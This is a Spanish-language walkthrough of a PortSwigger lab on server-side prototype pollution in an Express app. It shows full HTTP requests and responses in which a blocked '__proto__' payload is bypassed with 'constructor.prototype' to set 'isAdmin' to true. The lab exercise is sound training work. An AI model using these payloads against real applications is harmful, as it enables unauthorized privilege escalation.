Lab 8: Bypassing flawed input filters for server-side prototype pollution

https://portswigger.net/web-security/prototype-pollution/server-side/lab-bypassing-flawed-input-filters-for-server-side-prototype-pollution

Iniciamos capturando la peticion y enviando el siguiente request:

POST /my-account/change-address HTTP/2
Host: 0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Cookie: session=Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k
Content-Length: 206
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k","__proto__": {
    "isAdmin":true
}}

Pero no funciono:

HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"c5-o6PbsdZgCxd7ROzSod5GR7NXS6Q"
Date: Tue, 25 Jun 2024 20:49:10 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 197

{"username":"wiener","firstname":"Peter","lastname":"Wiener","address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","isAdmin":false}

Por lo anterior, se prueba la siguiente carga:

POST /my-account/change-address HTTP/2
Host: 0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Cookie: session=Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k
Content-Length: 208
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k","__proto__": {
    "json spaces":10
}}

La carga utilizada fue:

"__proto__": {
    "json spaces":10
}

Al revisar en raw la respuesta no se ve ningun cambio:

HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"c5-o6PbsdZgCxd7ROzSod5GR7NXS6Q"
Date: Tue, 25 Jun 2024 20:50:29 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 197

{"username":"wiener","firstname":"Peter","lastname":"Wiener","address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","isAdmin":false}

Por lo anterior, enviamos esta nueva carga:

POST /my-account/change-address HTTP/2
Host: 0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Cookie: session=Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k
Content-Length: 241
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k","constructor": {
    "prototype": {
        "json spaces":10
    }
}}

La petición previa responde asi:

HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"14f-29q9fCGeCtkRxLWffyqshWpiZ64"
Date: Tue, 25 Jun 2024 20:52:19 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 335

{
          "username": "wiener",
          "firstname": "Peter",
          "lastname": "Wiener",
          "address_line_1": "Wiener HQ",
          "address_line_2": "One Wiener Way",
          "city": "Wienerville",
          "postcode": "BU1 1RP",
          "country": "UK",
          "isAdmin": false,
          "json spaces": 10
}

Se puede ver el objeto "json spaces": 10 y tambien la identacion tiene 10 espacios.

Luego de identificar el payload funcional se procede a manipular el objeto que probablemente esta relacionado con el nivel de autorizacion o permisos de dicho usuario:

POST /my-account/change-address HTTP/2
Host: 0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Cookie: session=Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k
Content-Length: 239
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/json;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */
Origin: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4d00ac040906318067f3b600b7007c.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

{"address_line_1":"Wiener HQ","address_line_2":"One Wiener Way","city":"Wienerville","postcode":"BU1 1RP","country":"UK","sessionId":"Sl25AoaD4QZ39pnLlgtkLlvbtBEJ1M8k","constructor": {
    "prototype": {
        "isAdmin":true
    }
}}

La carga utilizada fue:

"constructor": {
    "prototype": {
        "isAdmin":true
    }
}

Y el resultado de la peticion fue exitoso:

HTTP/2 200 OK
X-Powered-By: Express
Cache-Control: no-store
Content-Type: application/json; charset=utf-8
Etag: W/"14e-/rxYzhSfiD4zL1vVonmGpZgVmW0"
Date: Tue, 25 Jun 2024 20:55:10 GMT
Keep-Alive: timeout=5
X-Frame-Options: SAMEORIGIN
Content-Length: 334

{
          "username": "wiener",
          "firstname": "Peter",
          "lastname": "Wiener",
          "address_line_1": "Wiener HQ",
          "address_line_2": "One Wiener Way",
          "city": "Wienerville",
          "postcode": "BU1 1RP",
          "country": "UK",
          "isAdmin": true,
          "json spaces": 10
}

Por lo anterior, podemos afirmar que se ha realizado una escalacion de privilegios exitosa.

AnteriorLab 7: Detecting server-side prototype pollution without polluted property reflection SiguienteLab 9: Remote code execution via server-side prototype pollution

Última actualización hace 1 año

¿Te fue útil?